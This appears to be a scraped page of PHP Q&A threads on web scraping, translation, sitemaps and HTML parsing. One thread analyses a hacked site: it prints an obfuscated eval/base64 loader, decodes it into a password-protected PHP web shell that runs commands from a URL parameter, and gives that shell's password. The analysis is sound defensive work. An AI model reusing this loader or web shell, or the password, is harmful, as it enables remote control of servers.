Php copy website table [duplicate] - php

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
HTML Scraping in Php
Far from being web developer expert, so sorry in advance if I'm missing something basic:
I need to copy a table into mySql database using PHP; the table resides in a website which I don't own, however I have permission to copy and publish.
Manually when I watch this website in my web-browser I need to click on a link in the main website URL (I can't reach the final destination page link since it changes all time, however the main page link is static and the link to click is also static).
Example to such a content I need to copy from (just an example, this is not the real content):
http://www.flightstats.com/go/FlightStatus/flightStatusByAirport.do?airportCode=JFK&airportQueryType=0

Most people are going to ask what have you tried. Since you mentioned that you don't have much development experience, here are some tips on how to go about it - have to put it as an answer so it is easier to read.
What you're going to need to do is scraping.
Using PHP, you'd use the following functions at the very least
file_get_contents() - this function will read the data in the URL
preg_match_all - use of regular expressions will let you get the data you are looking for. Though some/many people will say that you should go through the DOM.
The data that is returned with preg_match_all can be stored into your MySQL table. Though because the data changes so frequently, you might be better off just scraping that section and storing the entire table as cache (though I do have to say I have no idea what you are trying to do on your site - so I could well be wrong).

Related

How to dynamically translate a webpage [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
How would you transform a pre-existing web app in a multilingual one?
Best way to internationalize simple PHP website
I'm trying to figure out how to translate all the static texts on my webpage (I'm using PHP). But I'm not really sure what the "correct" way is. This is what I thought of so far, but maybe it's all wrong :D
1.
For every static piece of text on the page, just get the translation with something like "getTranslation("Hello World!") and it will just look up the translation in the database or a file like XML/CSV/PHP with all the translations.
But this seem pretty bad since we will have to query the database or parse the file on every page, everytime it's refreshed/loaded.
2
Everytime a page is loaded I could read from the database/file and store the translations for the current language in an array and get the translations from the array as the page is building, instead querying the database / parsing the file again.
3
Is there some way to read the translations only once and then make it accesible for all pages? The only thing I can think of is php's SESSION but it just seems so wrong to store the translations there.
So what the "most common" or "right" way to do it?
Happy hunting!
Sounds like you need gettext. gettext is widely used and widely supported. I'm pretty sure it's also pretty well optimized.

What is the best way to create a sitemap.xml? [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
How to create a sitemap using PHP & MySQL
So I'm kinda stuck here. I have a website with a pretty big database, that constantly changes. Now I want to help the search engines by supplying a sitemap.xml file. Normally I would use a webservice that would do this, but thats not really possible in this case.
To be honest. I have no clue where to start. How would I go about doing this? Sorry if this is a too basic question, but Google couldn't help me.
Edit: Some more info. DB is currently 1k pages. Want to go up to like 10k. I use Mysql to echo this from my database, and then htaccess to rewrite the URLs.
(PHP's get ID, etc)
You need to install a crawler of doing it like a webservice. The easier way is to write a php script and generate sitemap XML file by yourself.
Write a query to get the links from your database and then iterate over it to create a sitemap.
See this post for example php script How to create a sitemap using PHP & MySQL

Fetch data from other site (php & GET)

I am trying to get data from a site and be able to manipulate it to display it on my own site.
The site contains a table with ticks and is updated every few hours.
Here's an example: http://www.astynomia.gr/traffic-athens.php
This data is there for everyone to use, and I will mention them on my own site just to be sure.
I've read something about php's cURL but I have no idea if this is the way to go.
Any pointers/tutorials, or code anyone could provide so I can start somewhere would be very helpful.
Also any pointers on how I can get informed as soon as the site is updated?
If you want to crawl the page, use something like Simple HTML DOM Parser for PHP. That'll server your purpose.
First, your web host/localhost should have the php_curl extension enabled.
To start with, you should read a bit here. If you want to jump in directly, there is a simple function here Why I can't get website content using CURL. You just have to change the value of the variables $url,$timeout
Lastly, to get the updated data every 2hrs you will have to run the script as a cronjob. Please refer to this post
PHP - good cronjob/crontab/cron tutorial or book

What is the vulnerability in my PHP code? [duplicate]

This question already has answers here:
When is eval evil in php?
(20 answers)
Closed 3 years ago.
A website of mine was recently hacked. Although the actual website remain unchanged, they were somehow able to use the domain to create a link that re-directed to an ebay phishing scam.
I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP, and also some javascript (for form validation).
Is there a free service that will scan my code for vulnerabilities? What are my other options?
Thanks,
Jeff
EDIT: I've hosted the files at [link removed]
A few things to note: There are several files in the "funcs" folder, most of which aren't used, but I left them there just in case. The "new.php" (contents below) in the "data" folder is clearly the problem. The big question is, how did someone manage to upload "new.php" to the server? There's also an RTF of the e-mail I received which has info about the scam.
(caution: this code is probably "dangerous" to your computer)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
Interesting stuff going on here. The php block evaluates to a nice little "code generator":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
When the nasty variable names are substituted for something more readable, you get:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
which, when evaluated, spits out the code:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
Of note, the string: '417379a25e41bd0ac88f87dc3d029485' is the md5 hash of the password: Zrhenjq2009
I'll kick this around some more tomorrow.
Edit:
Ok, so I spent a few more minutes playing with this. It's looking like a remote control script. So now that this page (new.php) is sitting on your server, If a user hits this page and passes a url parameter named 'pass' with a value of 'Zrhenjq2009', they are then able to execute an external command on the server by passing the command and arguments in the url as the parameter named 'c'. So this is turning out to be a code generator which creates a backdoor on the server. Pretty cool.
I pulled down the file you uploaded and ran new.php through VirusTotal.com and it appears to be an new (or substantially modified) trojan. Additionally, it appears that 51.php is the PHPSpy trojan: VirusTotal analysis, 74.php is the PHP.Shellbot trojan VirusTotal Analysis and func.php is "webshell by orb". Looks like someone dropped a nice hack kit on your server along with the ebay phishing scripts/pages referenced in the document you uploaded.
You should probably remove the file download link in your original post.
If you get your hands on the logs, might be interesting to take a look.
Enjoy.
If you're using a VCS (version control, like git, mercurial, subversion, cvs) you can just do a diff from the last good commit and go from there.
You are using version control, right?
Do you have access to the server logs? If you have an approximate time when the first exploit occurred, they should be able to go a long ways into helping you figure out what the person did. Other than giving general advice, its really hard to say without more information.
Can you share the code (please make sure to remove user names / passwords etc)? If so I would be willing to take a look but it might take me a day or so (Sorry, I'm currently working on a SQL Injection Vulnerability report, recommendation for identifying restricted data, and future standards/process to prevent it in the future and I have four kids at home including a 3 month old).

Simplehtmldom - curl, loops, arrays?

Pse forgive what is most likely a stupid question. I've successfully managed to follow the simplehtmldom examples and get data that I want off one webpage.
I want to be able to set the function to go through all html pages in a directory and extract the data. I've googled and googled but now I'm confused as I had in my ignorant state thought I could (in some way) use PHP to form an array of the filenames in the directory but I'm struggling with this.
Also it seems that a lot of the examples I've seen are using curl. Please can someone tell me how it should be done. THere are a significant number of files. I've tried concatenating them but this only works with doing this through an html editor - using cat -> doesn't work.
You probably want to use glob('some/directory/*.html'); (manual page) to get a list of all the files as an array. Then iterate over that and use the DOM stuff for each filename.
You only need curl if you're pulling the HTML from another web server, if these are stored on your web server you want glob().
Assuming the parser you talk about is working ok, you should build a simple www-spider. Look at all the links in a webpage and build a list of "links-to-scan". And scan each of those pages...
You should take care of circular references though.

Categories